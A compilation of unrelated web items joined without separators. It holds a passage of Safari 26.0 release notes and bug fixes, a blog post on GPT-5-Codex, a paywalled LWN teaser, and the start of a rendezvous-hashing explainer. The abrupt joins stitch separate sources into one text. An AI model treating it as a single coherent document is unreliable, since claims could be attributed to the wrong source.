By using an SVG file for your icon, you leverage infinite vector scaling. You rely on Safari to do the work of creating rasterized icons at multiple sizes to be used in various locations. And an SVG file is also often a smaller download than the .png files commonly used for favicons.
Data URL images
are also now supported for icons as well, allowing you to express small image files as code.
WebGPU
WebKit for Safari 26.0 adds support for WebGPU.
WebGPU, a JavaScript API for running programs on the GPU, is similar to WebGL in its capabilities for graphics and rendering. Additionally, it adds compute shaders, which allow general purpose computations on the GPU, something not previously possible with WebGL.
WebGPU supersedes WebGL on macOS, iOS, iPadOS, and visionOS and is preferred for new sites and web apps. It maps better to
Metal
, and the underlying hardware. Comparatively, WebGL required significant translation overhead due to being derived from OpenGL which was designed prior to modern GPUs.
GPU programs are provided by the website or web app using the WebGPU Shading Language, known as WGSL (pronounced
wig-sill)
. It’s a new language that is verifiably safe for the web unlike some existing shading languages which allow for unchecked bounds accesses and pointer arithmetic.
WebGPU has been enabled in Safari Technology Preview for over a year, and is now shipping in Safari 26.0 for macOS, iOS, iPadOS, and visionOS. Given the level of hardware access provided by WebGPU, much consideration was taken to ensure WebGPU does not expose new security attack surfaces. Additionally, validation performed was streamlined recently to minimize overhead and maintain closer to native application performance.
Safari 26.0 expands support for
WebCodecs API
by adding
AudioEncoder
and
AudioDecoder
. WebCodecs gives developers low-level access to the individual frames of a video stream and chunks of audio. These additions make it possible to encode
AudioData
objects and decode
EncodedAudioChunk
objects.
Safari 26.0 now includes several improvements for
Media Source API (MSE)
. It adds support for
detachable
MediaSource objects to allow for seamless switching between objects attached to a media element. And it adds support for MediaSource prefers
DecompressionSession
.
And new since Safari 26 beta 1, WebKit now supports for in-band tracks in MSE.
WebRTC
WebKit brings multiple updates for WebRTC, adding support for:
Exposing CSRC information for RTCEncodedVideoStream
Speaker Selection API on iOS and iPadOS
Serialisation of RTCEncodedAudioFrame and RTCEncodedVideoFrame
ImageCapture.grabFrame
RTcRtpScriptTransformer.generateKeyFrame
to take a
rid
parameter
RTCEncodedAudioFrame and RTCEncodedVideoFrame constructors
New since WWDC25, Webkit for Safari 26.0 now supports exposing a default system speaker device.
And Safari 26.0 removed the
fec
and
rtx
from WebRTC encoding parameters.
Editing
To further support users as they edit content on the web, Safari 26.0 adds rendering native selection UI inside scrolled content.
HTTP
Also new since our announcements at WWDC25, Safari 26.0 now adds support for WebSocket over HTTP/2 and HTTP/3.
SVG
For SVG
group
containers, Safari 26.0 adds support for
pointer-events="bounding-box"
.
Website compatibility
Report a website issue
Now in Safari on macOS, iOS, and iPadOS, users can report an issue anytime they are having trouble with a webpage.
If you seem to have trouble that you don’t expect, first try reloading the page. If there’s still a problem, go to the Page menu, where you’ll find “Report a Website issue…” This brings up a quick set of multiple choice questions that provide the key information for us to spot patterns and better ensure a great experience in Safari.
Update to UA String
Also, now in Safari on iOS, iPadOS, and visionOS 26 the user agent string no longer lists the current version of the operating system. Safari 18.6 on iOS has a UA string of:
Mozilla/5.0 (iPhone; CPU iPhone OS 18_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Mobile/15E148 Safari/604.1
And Safari 26.0 on iOS has a UA string of:
Mozilla/5.0 (iPhone; CPU iPhone OS 18_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Mobile/15E148 Safari/604.1
This matches the long-standing behavior on macOS, where the user agent string for Safari 26.0 is:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15`
It was back in 2017 when Safari on Mac first started freezing the Mac OS string. Now the behavior on iOS, iPadOS, and visionOS does the same in order to minimize compatibility issues. The WebKit and Safari version number portions of the string will continue to change with each release.
To inspect a Service Worker you need to open a Web Inspector from Safari’s Develop menu. That’s because the execution context of a Service Worker is independent of the page that installed it. But the action handled by a Service Worker might have already occurred by the time you get to it via the Develop menu. This can happen, for example, with Web Push events where the Service Worker has already handled the incoming push.
To address this, Safari 26.0 introduces automatic inspection and pausing of Service Workers. This is similar to the existing feature for automatic inspection and pausing of JSContexts. To use it, open the Inspect Apps and Devices tool from the Develop menu. Identify the app or Home Screen Web App that uses a Service Worker you want to inspect and, from the three-dots menu, select the option labeled
Automatically Inspect New Service Workers
. The next time a Service Worker runs in that app, a Web Inspector window will open automatically for it. Use the
Automatically Pause New Service Workers
option to also pause JavaScript execution in the Service Worker as soon as it’s inspected. This allows you to set breakpoints and step through the code as actions are handled.
Recording Workers in the Timelines tab
Safari 26.0 makes it easier to debug Worker-related memory and performance issues using the Timelines tab in Web Inspector. Breakpoints, profiling data, events, call trees, and heap snapshots are now correctly attributed to each Worker and not its associated page. JavaScript code that runs in a Worker may also call
debugger
,
console.profile
, etc to supplement timeline data with application-specific milestones. Lastly, it is now possible to export and import data gathered from Workers in a Timeline recording.
Slotted badge
The Elements node tree in Web Inspector now shows a badge labeled
Slotted
next to nodes that have been inserted into corresponding
<slot>
nodes within Custom Elements. Click the badge to expand the node tree into the Shadow DOM of the Custom Element and jump to the
<slot>
node. If there is a correspondence, the
<slot>
node has a badge labelled
Assigned
next to it. Click this badge to jump to the node from the light DOM that is slotted here.
Improved async debugging experience
The Web Inspector debugger has been updated to provide a more intuitive debugging experience for asynchronous code. You can now step over an
await
statement as if it were synchronous, meaning the debugger will skip the underlying asynchronous mechanics and move to the next line of code in the function. This simplifies debugging because it allows you to focus on the intended logic of your code, rather than the potentially confusing execution path introduced by
await
.
New in Web Inspector since Safari 26 beta 1
Web Inspector adds support for two newer CSS features —
@starting-style
and
@scope
styles (in the Styles sidebar).
Safari 26.0 adds supports for the console to log both the URI and the time when entering a new navigation context. And adds supported for
console.profile
in
Worker
.
Web Inspector now supports exporting and importing data from worker targets in the Timelines tab.
WebKit in SwiftUI
WebKit has a brand-new API designed from the ground up to work with
Swift
and
SwiftUI
. This makes it easier than ever to integrate web content into apps built for Apple platforms.
The core parts of this new API are the new
WebView
and
WebPage
types.
WebView
To display your web content, simply use the new
WebView
type, a brand-new native
SwiftUI View
. All you need to do is give it a URL to display.
WebView
also supports a powerful set of new and existing view modifiers, like
webViewScrollPosition
,
webViewMagnificationGestures
,
findNavigator
, and more. For more advanced customization, like being able to react to changes in the content, you’ll need to connect it to a
WebPage
.
WebPage
WebPage is a brand new Observable class that can be used to load, control, and communicate with web content. You can even use it completely on its own, in cases where you don’t need to display the page directly to your users. But when you do, combining it with WebView allows you to build rich experiences, and integrate the web into your app with ease. WebPage has a full set of observable properties and functions you can use to make reacting to changes incredibly simple, especially with SwiftUI.
The new
URLSchemeHandler
protocol makes it super easy to implement handling custom schemes so that local resources and files can be used in your app. It leverages the full capabilities of Swift and Swift Concurrency, and you just need to provide it with an
AsyncSequence
.
WebPage.NavigationDeciding
is a new protocol that lets you customize how navigation policies should behave in your app across different stages of a navigation. In addition to
WebPage.NavigationDeciding
, there’s also
WebPage.DialogPresenting
to customize how dialogs presented from JS should be displayed.
We look forward to seeing what
Apple Developers
do with the new
WebPage
and
WebView
types for Swift and SwiftUI. As a web developer, it’s now easier than ever for you to use the skills you have to create an app for iOS, iPadOS, macOS, and visionOS.
Several improvements to WebKit API are available now in iOS, iPadOS, macOS, and visionOS beta.
Screen Time support
Local storage and session storage restoration APIs for WKWebView
The ability to applying
backdrop-filter
to content behind a transparent webview
A new
obscuredContentInsets
property added to WKWebView allows developers to specify areas of the web view that are covered by browser UI elements like tab bars or toolbars. Set this property to automatically adjust the layout viewport so web content renders within the visible area without being obscured by overlapping interface elements.
WebKit also deprecated WKProcessPool and WKSelectionGranularity.
Web Extensions
The new web-based Safari Web Extension Packager allows developers to take their existing web extension resources and prepare them for testing in Safari through TestFlight and distribution through the App Store. The tool is available in App Store Connect and uses Xcode Cloud to package the extension resources you provide into a signed app + extension bundle that can be used in Safari on macOS, iOS, iPadOS, and visionOS. Learn more about using the tool in our documentation on
developer.apple.com
.
Web Extension
commands
are now shown in the menubar on macOS and iPadOS. On macOS, users can customize the keyboard shortcut associated with a command in Safari Settings.
Web Extensions can now be loaded in
SafariDriver
. This feature allows developers to test their extension in an automated setting. Using Selenium, you can register custom commands to utilize this new feature.
Learn more about these commands in the documentation on the WebExtensions Community Group
GitHub
.
New since WWDC25, Safari 26.0 adds support for Web Extension for
dom.openOrClosedShadowRoot()
.
Content Blockers
Content blockers
are a kind of extension that give Safari a set of rules to use to block content in the browser window. Blocking behaviors include hiding elements, blocking loads, and stripping cookies from Safari requests.
Safari 26.0 includes three new features for content blockers:
unless-frame-url
the request-method content blocker trigger field
isContentRuleListRedirect
WebAssembly
As WebAssembly continues to grow in popularity, WebKit has been improving WebAssembly performance across the board. Now, WebAssembly is first evaluated by our new in-place interpreter. This allows large WebAssembly modules to launch even faster and use less memory, while retaining the same top end throughput after warming up.
Networking
WebKit now supports
<link rel=dns-prefetch>
on iOS, iPadOS, and visionOS. It gives a hint to the browser to perform a DNS lookup in the background to improve performance. Supported on macOS since Safari 5, it now has improved privacy.
Privacy
In our continuing efforts to improve privacy and protect users, Safari 26.0 now prevents known fingerprinting scripts from reliably accessing web APIs that may reveal device characteristics, such as screen dimensions, hardware concurrency, the list of voices available through the SpeechSynthesis API, Pay payment capabilities, web audio readback, 2D canvas and more. Safari additionally prevents these scripts from setting long-lived script-written storage such as cookies or LocalStorage. And lastly, Safari prevents known fingerprinting scripts from reading state that could be used for navigational tracking, such as query parameters and
document.referrer
.
Lockdown Mode
Available on iOS, iPadOS, watchOS, and macOS,
Lockdown Mode
is an optional, extreme protection that’s designed for the very few individuals who, because of who they are or what they do, might be personally targeted by some of the most sophisticated digital threats. This includes limiting some of what websites can do to ensure the highest level of protection.
Since its beginning, Lockdown Mode disallowed the use of most web fonts. Now instead, web fonts are evaluated by the new Safe Font Parser, and if they pass the evaluation, they are allowed. This means almost all content will be displayed using the specified web fonts in Lockdown Mode.
Device management
Device management
lets an administrator securely and remotely configure devices. It’s often used when a fleet of devices is used by a lot of people at work or school, and the administrator responsible for those devices needs tooling for more easily taking care of them all.
Safari 26.0 adds two new features to further support device management. Now a managed device can have a folder of managed bookmarks. And a managed device can have managed new tab or new window page (home page, blank page, extension new tab page).
Security
Security improvements in Safari 26.0 include adding support enforcing the
Integrity-Policy
header on script destinations. And adding a new configuration to support Google Safe Browsing version 5 traffic to Safari and WebKit clients with the web browser entitlement.
Bug fixes and more
Along with all of these new features, WebKit for Safari 26.0 includes a plethora of fixes to existing features.
Accessibility
Fixed
aria-expanded
attribute support on navigation links. (141163086)
Fixed presentational images with empty
alt
attributes to be ignored by assistive technology, even when additional labeling attributes are set. (146429365)
Fixed
<figcaption>
within a
<figure>
element to only contribute to the accessible name of an
<img>
element if the image lacks other labeling methods like
alt
, ARIA attributes, or the
title
attribute. (150597445)
Fixed handling of invalid values for
aria-setsize
and
aria-posinset
according to the most-recent revision of the ARIA specification. (151113693)
Fixed VoiceOver reading “Processing page %infinity” when loading large pages. (152617082)
Fixed VoiceOver failing to output newlines in certain circumstances when using caret navigation. (154368379)
Fixed an issue where dynamic changes to iframe display properties could cause the iframe’s scroll view to incorrectly become the accessibility root, preventing assistive technologies from accessing content outside the iframe. (156440342)
Fixed CSS
content
alt
text when used on an element to be announced by VoiceOver. (156666741)
Browser
Fixed keyboard typing to cancel voice dictation. (152597958)
Fixed: Safari now reports a frozen OS version in its user agent string on iOS 26 and iPadOS 26, showing the last version released before iOS 26. (156170132)
CSS
Fixed
cursor: pointer
not appearing on an
<area>
element used in conjunction with an
<img usemap="...">
element. (74483873)
Fixed: Apply space from align-content when grid container and rows have definite sizes during column sizing (85252183)
Fixed
<frame>
and
<frameset>
to always be in-flow and non-floating. (102670652)
Fixed grid sizing with inline-size containment and auto-fit columns is incorrectly sized. (108897961)
Fixed “inherit” as a variable substitution fallback when setting custom property. (136463977)
Fixed content skipped with
content-visibility: auto
to be findable. (141237620)
Fixed an issue wrapping an SVG at the end of a line when using
text-wrap: balance
. (141532036)
Fixed
@font-face font-family
descriptor to not allow a list of values. (142009630)
Fixed the computed value of a float with absolute positioning to be
none
when there is no box. (144045558)
Fixed buttons to not have
align-items: flex-start
by default. (146615626)
Fixed style container query on
:host
CSS pseudo-class to be correctly applied to slotted elements. (147684247)
Fixed
@scope
to create a style rule with a nested context. (148101373)
Fixed changing
content-visibility
from
visible
to
hidden
to repaint correctly. (148273903)
Fixed an issue where float boxes, selections, and carets were incorrectly painted inside skipped subtrees. (148741142)
Fixed incorrect
getBoundingClientRect()
inside skipped subtree on an out-of-flow positioned box. (148770252)
Fixed making
<pre>
and other elements use logical margins in the User-Agent stylesheet. (149212392)
Fixed
space-around
and
space-evenly
to fallback to
safe center
for
align-content
. (153403381)
Fixed the serialization of
<color>
custom properties to provide the used value. (153675017)
Canvas
Fixed re-drawing a canvas with relative width when the parent element is resized. (121996660)
Fixed
getContext('2d', { colorSpace: 'display-p3' })
in iOS Simulator. (151188818)
DOM
Fixed the serialization of
CDATASection
nodes in HTML. (150739105)
Editing
Fixed the selection UI to be clipped in overflow scrolling containers. (9906345)
Fixed selection issues caused by
<br>
elements between absolute positioned elements. (123637358)
Fixed selection failing to update during auto or keyboard scrolling. (144581646)
Forms
Fixed form associated ElementInternals always reporting a
customError
when using
setValidity
. (115681066)
Fixed
setValidity
of
ElementInternals
to handle missing optional
anchor
parameter. (123744294)
Fixed updating scrollbar appearance correctly for the page and
<textarea>
elements. (151496190)
Fixed programmatically assigned File objects to display the correct filename in
<input>
elements, even without a file path. (152048377)
Fixed labels inside
<select>
elements to behave consistently with other browsers by using standard attribute matching instead of quirk mode handling. (152151133)
Fixed allowing the custom element itself to be passed as validation anchor in the
setValidity()
API. (154303420)
Fixed the intrinsic size of number inputs when the spin button width is a percentage value. (154680747)
Images
Fixed zoomed
<img>
to not cause unwanted rounding of
width
and
height
. (150473104)
JavaScript
Fixed
Array.prototype.pop
to throw an exception when the array is frozen. (141805240)
Fixed performance of
Math.hypot()
that was significantly slower than
Math.sqrt()
. (141821484)
Fixed
RegExp#[Symbol.search]
to throw
TypeError
when
lastIndex
isn’t writable. (146488846)
Fixed
Array#indexOf
and
Array#includes
to treat
+0
and
-0
as the same value. (148472519)
Fixed iterator helpers incorrectly closing iterators on early errors. (148774612)
Fixed
Iterator.prototype.reduce
failing with an
undefined
initial parameter. (149470140)
Fixed: Aligned
f() = 1
behavior with other engines when not using strict mode. (149831750)
Fixed nested negated classes resulting in incorrect matches. (151000852)
Fixed DateTime string parsing for ISO8601 inputs. (153679940)
Fixed
toIntegerOrInfinity
to truncate negative fractional values to
+0.0
. (153939418)
Fixed the order of function’s special properties returned by
Object.keys
and
Object.entries
. (155607661)
Media
Fixed picture-in-picture to exit when the video element is removed. (123869436)
Fixed MP4 seeking with b-frames to prevent out-of-order frame display by suppressing frames with earlier presentation timestamps following the seek point. (140415210)
Fixed media elements on iPadOS to support the volume being changed by web developers, similar to macOS and visionOS. The
:volume-locked
pseudo-class can continue to be used for feature detection. (141555604)
Fixed seeking or scrubbing not always seeking to the time requested. (142275903)
Fixed stale audio buffer data after seeking when playing sound through an AudioContext. (146057507)
Fixed subtitle tracks with no
srclang
to be shown with the correct label. (147722563)
Fixed MediaSession to handle SVG icons with subresources. (150665852)
Fixed
MediaCapabilitiesDecodingInfo.configuration
to be correctly populated even when
.supported
is
false
. (150680756)
Fixed video elements with WebM object URLs causing MediaError code 2. (151234095)
PDF
Fixed “Open with Preview” button to open a PDF in the Preview app. (148680145)
Rendering
Fixed
overflow: hidden
to not clip
filter: drop-shadow()
. (72205047)
Fixed a
list-style-position: inside
list item marker to be rendered as the first child of the list item. (79587134)
Fixed using
setDragImage
with a fixed-position element, so that the drag preview bitmap includes the correct content. (90120656)
Fixed an issue to allow images in scroll containers to load when they are near the viewport rather than when they are intersecting the viewport. (118706766)
Fixed CSS filters to establish a containing block like transform does. (119130847)
Fixed a disappearing stretched image in a vertical flexbox layout. (135897530)
Fixed CSS gradient interpolation for “longer hue” gradients when an end color stop is omitted. (142738948)
Fixed
will-change: view-transition-name
to create a stacking context and a backdrop root. (146281670)
Fixed
will-change: offset-path
to create a stacking context and a containing block. (146292698)
Fixed
<datalist>
dropdowns not displaying option labels. (146921617)
Fixed the text indicator sometimes getting clipped during a bounce animation. (147602900)
Fixed not marking
content-visibility: hidden
content for layout when targeting
content-visibility: auto
. (148663896)
Fixed incorrect
ruby
annotation positioning in
sideways-lr
. (148713073)
Fixed: Prevented hit testing content inside a skipped subtree. (148741508)
Fixed an issue where
feMerge
incorrectly positioned HTML elements when merging the same
feMergeNode
multiple times. (149431216)
Fixed
box-shadow
with spread on a border-radius box to scale the radii correctly. (149490613)
Fixed an issue in determining when a flex item should be used for percentage resolution during intrinsic width computation. (149615295)
Fixed an issue causing a
<canvas>
element to disappear for one frame if a view transition occurs. (149709642)
Fixed
<div contenteditable>
within an
<iframe>
not scrolling into the viewport on receiving focus for the second time. (150521759)
Fixed invisible
<audio>
controls when transformed due to incorrect coordinate space calculations for clipped child elements. (150526971)
Fixed centering text for
<input type=button>
elements with
display: flex
. (151148821)
Fixed showing a resize cursor even when text overlaps the resize control. (151309503)
Fixed SVG transform
translate(X)
not equal to
translate(X,0)
. (151643419)
Fixed
border-image
repaint code is broken in some writing modes. (152396671)
Fixed rendering an image with a
filter
and
mix-blend-mode
only getting filtered but not mixed. (152460888)
Fixed
box-shadow
to repaint correctly in
vertical-rl
and
horizontal-bt
writing modes. (152803240)
Fixed
border
to no longer be adjusted in computed style for elements with native appearance (153152167)
Fixed
margin-trim
to not trim inline margins on block-level boxes, regardless of their position. (153240895)
Fixed
text-wrap-style
to not constrain single line content. (153755326)
Fixed inputs within
inline-block
containers shifting vertically when text is deleted and re-entered into an input. (154094432)
Fixed baseline alignment participation to expand to items with automatic logical width in the alignment axis. (154311395)
Fixed grid containers incorrectly processing first-letter pseudo-elements when they should not contribute a first formatted line according to the CSS Grid specification. (154504582)
Fixed grid items hit-testing order to align with painting order. (154990290)
SVG
Fixed SVG paint server fallback handling for a non-existent URL. (144493507)
Fixed respecting the CSS
image-rendering
property when drawing an SVG. (144507619)
Fixed ancestor bounding box for “disabled”
<foreignObject>
and
<image>
. (147455573)
Fixed: Improved handling of SVG images with subresources. (148607855)
Fixed handling of
auto
for
rx
and
ry
on
<ellipse>
. (153274593)
Safari View Controller
Fixed
lvh
and
vh
viewport units getting incorrectly sized relative to the small viewport in SFSafariViewController. (108380836)
Scrolling
Fixed selection does not update during autoscroll when selecting with a gesture or a mouse. (144744443)
Fixed autoscrolling for smooth scrolling while selecting text. (144900491)
Fixed inconsistent decimal values from
getBoundingClientRect
for sticky elements. (147163986)
Fixed scroll compensation transform to be applied before any other transforms. (155992464)
Service Workers
Fixed the ReadableStream cancel method not getting reliably called in Service Worker. (144297119)
Fixed an issue where navigation preload responses incorrectly retained a redirection flag when served from disk cache, causing security check failures during loading. (144571433)
Fixed
structureClone
to preserve
Error.cause
. (152725880)
Spatial Web
Fixed various issues related to spatial audio not working in visionOS that could occur when repositioning Safari widows or moving a tab to a new window. (145661522)
Fixed the shape of gaze glow regions for elements with associated labels when the element has non-uniform border radii or if the element is styled with
clip-path
. (154258426)
Text
Fixed generating text fragments around text that contains newlines. (137109344)
Fixed generating text fragments when the selected text starts and ends in different blocks. (137761701)
Fixed bold synthesis to be less aggressive. (138047199)
Fixed Copy Link with Highlight not working when selecting text that is its own block and when that text exists higher up in the document. (144392379)
Fixed selections that start or end in white space not creating text fragments. (145614181)
Fixed
<b>
and
<strong>
to use
font-weight: bolder
to match the Web Specification. (146458131)
Fixed Korean counter styles to be aligned with manual Korean numbering in lists. (152969810)
Fixed content spacing for elements with
text-align: justify
and
white-space: pre-wrap
applied. (154211168)
URLs
Fixed percent-encoding
^
in non-opaque URL paths. (146233526)
Fixed ensuring that opaque URL paths always roundtrip. (146848690)
Fixed making URL host and hostname setters handle
@
correctly. (146886347)
Fixed Windows drive letter after
file:///
when parsing URLs. (147381130)
Web API
Fixed: URL’s protocol setter should forbid switching non-special to special schemes. (82549495)
Fixed event dispatching to be done by the fullscreen rendering update steps. (103209495)
Fixed the
mousemove
event to be fired when the mouse stays in the document but there is no element. (120551245)
Fixed an overly broad fullscreen exit trigger by restricting it to only text-entry elements gaining focus, preventing non-text input types from causing unexpected fullscreen exits. (136726993)
Fixed
WKDownload.originatingFrame
of downloads originated without a frame. (145328556)
Fixed fullscreen to use a single queue for event dispatching. (145372389)
Fixed the
ProgressEvent
members
loaded
and
total
to use the
double
type as per a recent specification change. (146356214)
Fixed Intrinsic Sizing of SVG embedded via
<embed>
to be invalidated on navigation. (147198632)
Fixed an issue where pending utterances do not receive an error event when speech synthesis is cancelled. (148731039)
Fixed escaping
<
and
>
when serializing HTML attribute values. (150520333)
Fixed making the SpeechRecognition interface available only within a secure context. (151240414)
Fixed the
<option>
element to not trim the label value and correctly handle an empty label. (151309514)
Fixed IntersectionObvserver to notify observers asynchronously. (152684301)
Fixed setting
innerHTML
to correctly use a scoped custom element registry associated with the context object. (154333132)
Fixed
attachShadow
throwing type error with a ShadowRoot document-fragment. (154658449)
Web Animations
Fixed CSS scroll-driven animations on pages using
requestAnimationFrame
to animate correctly after navigating away and back to the page. (141528296)
Fixed computing the time offset as needed when applying accelerated actions. (142604875)
Web Apps
Fixed the “Add to Home Screen” flow failing to load webpage data, preventing users from making new Home Screen web apps. (154655565)
Web Extensions
Fixed
tabs.update
to not remove history from the target tab. (134939755)
Fixed including the extension’s icon in the commands menu item and prevented customization using System Settings. (135360504)
Fixed a bug where the
runtime.MessageSender
origin parameter would be lowercased, differing from the result returned from
runtime.getURL
. (140291738)
Fixed high priority redirects to supercede low priority blocks for declarativeNetRequest. (145241581)
Fixed
"excludeMatches"
array in
scripting.registerContentScripts()
API getting ignored in Safari web extensions. (145489255)
Fixed a
declarativeNetRequest
bug that prevents redirects to extension resources. (145569361)
Fixed processing of
declarativeNetRequest
rules so that higher numbers are treated as higher priority. (145570245)
Fixed an issue causing
wasm-unsafe-eval
to not get parsed as a valid CSP keyword. (147551225)
Fixed
permissions.getAll()
to return the correct origins if all urls and/or hosts match pattern(s) have been granted. (147872012)
Fixed a non-fatal
webRequest
error for non-persistent background content. (150051544)
Fixed
allowAllRequests
declarativeNetRequest rules so that a higher priority correctly overrides a lower-priority block rule. (152746422)
Fixed CSS
display: none
matching everything still getting applied even after an
ignore-following-rules
action was matched. (152996225)
Fixed calling
scripting.registerContentScripts()
sometimes returning the error: “Error: Invalid call to scripting.registerContentScripts(). Failed to add content script.” (153001967)
Web Inspector
Fixed pretty-printing CSS to avoid adding a space after the universal selector (
) when followed by a pseudo-class or pseudo-element, preventing unintended changes to CSS selector behavior. (71544976)
Fixed to show a separate overview for each target in the Timelines tab. (146356054)
Fixed a performance issue when blackboxing a large number of sourcemaps. (148116377)
Fixed the debugger to step over an
await
statement as though it is synchronous code. (149133320)
Fixed parsing sourcemaps asynchronously so that large sourcemaps do not block rendering. (151269154)
Fixed the Timelines tab to consistently display the target’s hierarchical path for JavaScript and Events to prevent confusion when working with multiple targets. (152357197)
Fixed clicking on the “+” button in the Sources tab sidebar doing nothing when Web Inspector is undocked. (153193833)
Fixed Quick Open dialog to show results when an Inspector Bootstrap script exists. (154947309)
WebKit API
Fixed a crash at launch in iOS Simulator for apps built for older deployment targets that bind to specific WebKit API. (152200884)
WebRTC
Fixed switching from speaker to receiver does not work the first time, but only the second time. (141685006)
Fixed
enumerateDevices
returning devices as available when permissions are denied. (147313922)
Fixed
enumerateDevices
to not check for device permission. (148094614)
Fixed WebRTC encoded transform to transfer to the RTC encoded frame array buffer. (148343876)
Fixed RTC encoded frame timestamp should be persistent. (148580865)
Fixed the
configurationchange
event to fire when a microphone’s audio unit changes its echo cancellation mode, ensuring web pages are notified of such changes to update track settings accordingly. (150770940)
Feedback
We love hearing from you. To share your thoughts, find our web evangelists online: Jen Simmons on
Bluesky
/
Mastodon
, Saron Yitbarek on
BlueSky
, and Jon Davis on
Bluesky
/
Mastodon
. You can follow WebKit
on LinkedIn
. If you run into any issues, we welcome your
feedback
on Safari UI (learn more about
filing Feedback
), or your
WebKit bug report
about web technologies or Web Inspector. If you run into a website that isn’t working as expected, please file a report at
webcompat.com
. Filing issues really does make a difference.
If you are running macOS Sequoia or macOS Sonoma, you can update Safari by itself, without updating macOS. Go to > System Settings > General > Software Update and click “More info…” under Updates Available.
To get the latest version of Safari on iPhone, iPad or Apple Vision Pro, go to Settings > General > Software Update, and tap to update.
GPT‑5-Codex and upgrades to Codex
. OpenAI half-released a new model today: GPT‑5-Codex, a fine-tuned GPT-5 variant explicitly designed for their various AI-assisted programming tools.
I say half-released because it's not yet available via their API, but they "plan to make GPT‑5-Codex available in the API soon".
At this point it's best to think of
Codex
as OpenAI's brand name for their coding family of models and tools.
The new model is already integrated into their VS Code extension, the Codex CLI and their Codex Cloud asynchronous coding agent. I'd been calling that last one "Codex Web" but I think Codex Cloud is a better name since it can also be accessed directly from their iPhone app.
Codex Cloud also a new feature: you can configure it to automatically run code review against specific GitHub repositories (I found that option on
chatgpt.com/codex/settings/code-review
) and it will create a temporary container to use as part of those reviews. Here's the
relevant documentation
.
Some documented features of the new GPT-5-Codex model:
Specifically trained for code review, which directly supports their new code review feature.
"GPT‑5-Codex adapts how much time it spends thinking more dynamically based on the complexity of the task." Simple tasks (like "list files in this directory") should run faster. Large, complex tasks should use run for much longer - OpenAI report Codex crunching for seven hours in some cases!
Increased score on their proprietary "code refactoring evaluation" from 33.9% for GPT-5 (high) to 51.3% for GPT-5-Codex (high). It's hard to evaluate this without seeing the details of the eval but it does at least illustrate that refactoring performance is something they've focused on here.
"GPT‑5-Codex also shows significant improvements in human preference evaluations when creating mobile websites" - in the past I've habitually prompted models to "make it mobile-friendly", maybe I don't need to do that any more.
"We find that comments by GPT‑5-Codex are less likely to be incorrect or unimportant" - less unimportant comments in code is definitely an improvement!
Theo Browne
has a video review
of the model and accompanying features. He was generally impressed but noted that it was surprisingly bad at using the Codex CLI search tool to navigate code. Hopefully that's something that can fix with a system prompt update.
Finally, can it drew a pelican riding a bicycle? Without API access I instead got Codex Cloud to
have a go
by prompting:
Generate an SVG of a pelican riding a bicycle, save as pelican.svg
[$] Fighting human trafficking with self-contained applications
Linux Weekly News
lwn.net
2025-09-15 20:15:06
Brooke Deuson is the developer behind
Trafficking Free Tomorrow, a nonprofit organization that
produces free software to help law enforcement combat human trafficking. She is
a survivor of human trafficking herself.
She spoke at RustConf 2025 about her
mission, and why she chose to write her anti-...
Reader subscriptions are a necessary way
to fund the continued existence of LWN and the quality of its content.
If you are already an LWN.net subscriber, please log in
with the form below to read this content.
Please consider
subscribing to LWN
. An LWN
subscription provides numerous benefits, including access to restricted
content and the warm feeling of knowing that you are helping to keep LWN
alive.
(Alternatively, this item will become freely
available on September 25, 2025)
Rendezvous hashing is an algorithm to solve the distributed hash table problem - a common and general pattern in distributed systems. There are three parts of the problem:
Keys:
unique identifiers for data or workloads
Values:
data or workloads that consume resources
Servers:
entities that manage data or workloads
For example, in a distributed storage system, the
key
might be a filename, the
value
is the file data, and the
servers
are networked data servers that collectively store all of the files. Given a key and a dynamic list of servers, the task is to map keys to servers while preserving:
Load Balancing:
Each server is responsible for (approximately) the same number of loads.
Scalability:
We can add and remove servers without too much computational effort.
Lookup Speed:
Given a key, we can quickly identify the correct server.
The set of servers is dynamic in the sense that we are allowed to add or remove servers at any time during the operation of the system.
Introduction to Rendezvous Hashing
When confronted with a load balancing problem, most engineers will pick an algorithm based on consistent hashing. Rendezvous hashing is much less well-known, despite being older than consistent hashing and providing different technical advantages. Why is this so?
The simple answer is that computer science courses often cover consistent hashing without introducing rendezvous hashing, but I think there is a deeper underlying reason for the popularity difference. In 1999, Akamai Technologies hosted the ESPN March Madness games and the movie trailer for
Star Wars: The Phantom Menace
. The trailer was so popular that the traffic crashed the film studio’s website - Akamai’s webcaches were the only way to access the video for several days.
This event generated substantial public interest in Akamai
, and the core component of Akamai’s content delivery network was consistent hashing. Then, the
2007 DynamoDB paper from Amazon
touted consistent hashing as an integral part of Amazon’s successful commercial database. I suspect that rendezvous hashing is less popular because it never had the same kind of “killer app” moments.
However, rendezvous hashing is far from obsolete - engineering teams have quietly used the algorithm with great success since 1996. In fact, there seems to be a renewed interest in
rendezvous hashing as an alternative to consistent hashing
. Consistent hashing trades load balancing for scalability and lookup speed, but rendezvous hashing provides an alternative tradeoff that emphasizes equal load balancing. Over the last few years, rendezvous hashing has re-emerged as a
good algorithm to load balance medium-size distributed systems
, where an \(O(N)\) lookup cost is not prohibitive.
Why is it called “Rendezvous Hashing”?
The motivation of
the original 1996 paper
was to provide a way for a data provider to communicate data to a client through a proxy server. To exchange the data, the client and provider meet - or
rendezvous
- at a selected proxy server. Rendezvous hashing is a distributed way for the client and provider to mutually agree on the meeting location.
Rendezvous Hashing Algorithm
The goal of rendezvous hashing is to have good load balancing performance - we want each server to be responsible for about the same number of key-value pairs. One reasonable way to make this happen is for each key to select a server uniformly at random, just like with an ordinary hash table. The trick is that if we simply hash the keys to the servers, all of the hash values change when we modify the number of servers.
Rendezvous hashing provides a clever solution. Rather than pick a single server, each key generates a randomly sorted list of servers and chooses the first server from the list. To guarantee a successful lookup, we must ensure that each key-value pair is managed by the key’s first server choice. I call this property the “first choice” invariant.
If our first choice for a server goes offline, we simply move the key to the second server in the list (which becomes our new first choice). It is easy to see that we only need to move the keys that were previously managed by the server that went offline. The rest of the keys do not need to move, since they are still managed by their first choice. For example, if we were to delete server S2 in the example, the items in S2 would move to their new first choices: S1 and S3. None of the other items have to move though, since S2 wasn’t their first choice.
One Weird Hashing Trick
To use rendezvous hashing, each key needs its own unique server priority list. How do we generate a random permutation of servers for each key?
It turns out that we can directly apply a common hashing technique to permute a set of items.
1
